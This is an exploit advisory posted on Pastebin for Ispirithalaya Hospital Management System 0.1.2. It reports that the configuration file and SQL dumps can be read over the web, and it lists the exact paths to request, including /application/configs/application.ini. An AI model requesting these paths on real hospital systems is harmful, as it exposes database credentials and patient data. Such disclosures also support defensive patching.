Advertisement
KingSkrupellos

Ispirithalaya Hospital 0.1.2 Database Config Disclosure

Feb 13th, 2019
258
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.21 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Ispirithalaya Hospital Management System 0.1.2 Database Config Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/02/2019
  7. # Vendor Homepage : freeehospital.com
  8. # Software Download Link : sourceforge.net/projects/ispirithalaya/files/latest/download
  9. # Software Information Link : sourceforge.net/projects/ispirithalaya/
  10. # Software Version : 0.1.2
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ####################################################################
  20.  
  21. # Description about Software :
  22. ***************************
  23. Ispirithalaya system has e channeling, checking , lab test, reservation.
  24.  
  25. It is written by zend php framework and mysql db. doctors and patients
  26.  
  27. can log the system and chat. It has payment gateway integration.
  28.  
  29. ####################################################################
  30.  
  31. # Impact :
  32. ***********
  33. Ispirithalaya Hospital Management System 0.1.2 [ and other versions ] configuration file may potentially
  34.  
  35. disclose sensitive information to remote attackers.
  36.  
  37. The configuration file that Ispirithalaya Hospital Management System 0.1.2 stored in /application/configs/application.ini
  38.  
  39. HTTP requests consisting of a single character will cause the software to
  40.  
  41. disclose sensitive configuration information, including the password/database to the administrative web interface.
  42.  
  43. This file is installed, by default, with world readable and possibly world writeable permissions enabled.
  44.  
  45. This may have some potentially serious consequences as the configuration
  46.  
  47. file also stores password information in plain text.
  48.  
  49. This issue occurs because access controls on configuration files are not properly set.
  50.  
  51. An attacker can exploit this issue to retrieve potentially sensitive information.
  52.  
  53. Attackers can access config file via URL request. This may aid in further attacks.
  54.  
  55. ####################################################################
  56.  
  57. # Database Config Disclosure Exploit :
  58. *********************************
  59. /application/configs/application.ini
  60.  
  61. resources.db.adapter =
  62. resources.db.params.host =
  63. resources.db.params.username =
  64. resources.db.params.password =
  65. resources.db.params.dbname =
  66.  
  67. /data/db/ispirithalaya-data.sql
  68.  
  69. -- phpMyAdmin SQL Dump
  70. -- version 3.3.9
  71. -- phpmyadmin.net
  72. --
  73. -- Host: localhost
  74. -- Generation Time: Oct 18, 2011 at 05:21 PM
  75. -- Server version: 5.5.8
  76. -- PHP Version: 5.3.5
  77.  
  78. /data/db/ispirithalaya.sql
  79.  
  80. - phpMyAdmin SQL Dump
  81. -- version 3.3.10deb1
  82. -- phpmyadmin.net
  83. --
  84. -- Host: localhost
  85. -- Generation Time: Oct 15, 2011 at 11:31 AM
  86. -- Server version: 5.1.54
  87. -- PHP Version: 5.3.5-1ubuntu7.2
  88.  
  89. ####################################################################
  90.  
  91. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  92.  
  93. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement